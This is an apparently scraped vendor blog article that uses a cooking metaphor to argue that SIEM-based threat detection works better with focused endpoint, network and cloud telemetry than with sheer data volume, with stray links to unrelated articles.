General

What is the Recipe for Threat Detection?

Threat I grew up in a family restaurant and learned to cook around age 8. My food wasn’t good, though. It was too busy. I was trying too hard. A simple lesson all good cooks know is that less is more. Too many ingredients and spices make dishes bland because nothing stands out.

Threat

After working in cybersecurity for the past decade, I can confidently say the same logic applies to threat detection. You can’t throw everything into a pot and hope to get a good outcome. The right data, used in the right way, can provide much better outcomes than a strategy that is based on data volume.

Related:- Shopify’s Surprise Third-Quarter Loss Jolts Investors

SIEMs: Too Many Cooks Spoil the Broth

Threat detection is undeniably a data problem. It is logical that there should be a data-focused solution. Enter the SIEM. SIEMs started to come onto the market around 2005. When I worked as a Security Analyst, simply presenting me with the relevant Firewall, IDS, AV, and OS logs was sufficient to identify a true positive security issue. But much has changed since 2005.

Today, security controls such as NGFW and NGAV do a great job at preventing known threats to reduce the overall event volume an organization has to deal with. However, most controls do a poor job of providing granular information, what we call telemetry, that can be used to detect threats that have not been prevented. Typical SIEM deployments aim to detect threats by allowing users to configure rules so that a manageable number of qualified alerts are produced. The problem is, a broken clock is right twice a day. Most organizations spend a lot of effort to get their SIEMs into a state where event volume is manageable only to discover the alerts are mostly false positives. They then seek out additional security controls and integrations only to discover that the SIEM needs more – more tuning, more storage, more processing power. The process of playing with the volume knobs, spending more on consulting, and dealing with false positives continues. None of this dissuades the adversary in any way.

Related:- Social Networking Apps Similar To Facebook & Instagram

The Best Dishes are Made with The Best Ingredients

Starting with the premise that threat detection is the practice of automatically finding suspicious or malicious activity that has NOT been prevented by security controls, let us look at what ingredients should be in our threat detection recipe.

  • Endpoint Telemetry – This is the most basic ingredient of threat detection. Adversaries who are not stopped by security controls very often establish a foothold in an organization through a workstation or server. From there, “Living off the Land” techniques are employed. You can check out the LOLBAS Github project (Living off The Land Binaries and Scripts) to understand more about Living off the Land techniques. Endpoint telemetry from well instrumented EDR, NGAV, and similar endpoint tools provides the raw data needed to detect Living off the Land activity. This activity can typically be caught early in the intrusion process (during discovery, defensive evasion, lateral movement, and data collection). You can read more about Living off the Land and other findings from hundreds of our incident response engagements by downloading the free Incident Response Insights Report.
  • Network Telemetry – NGFWs and other network security controls still have a critical part to play in threat detection, but not in the way that most SIEMs process the data. Most SIEMs look to prioritize alerts from network controls by using rules and correlation to upgrade or downgrade the alert from the vendor’s default. There are simply too many alerts generated by most network controls for this strategy to work. Network Telemetry should be used to ensure you are capturing as many netflows and DNS requests going in and out of the environment as possible. This is critical because not every IP enabled device can run EDR/NGAV tools, but they can all be compromised. Statistical analysis of netflows alone can yield true-positive alerts, but the ratio of true to false positives tends to be very low. (A great, short outline of pros and cons of this approach can be found in a blog post by Anton Chuvakin). Correlating alerts and netflows with higher fidelity information helps in investigations.
  • Cloud Telemetry – As more workloads, applications, and IT assets are moving to cloud models, telemetry from various cloud applications and APIs is critical to achieving full visibility across an organization. Universally, data and events about authentication and user activity in the cloud is essential. Some organizations may have additional value in gathering application or transaction data, but almost all notable breaches involving cloud assets or service hinged on credential theftabuse, or access permissions. In other words, not “hacking” in the academic sense, just good ‘ole fashion theft and fraud.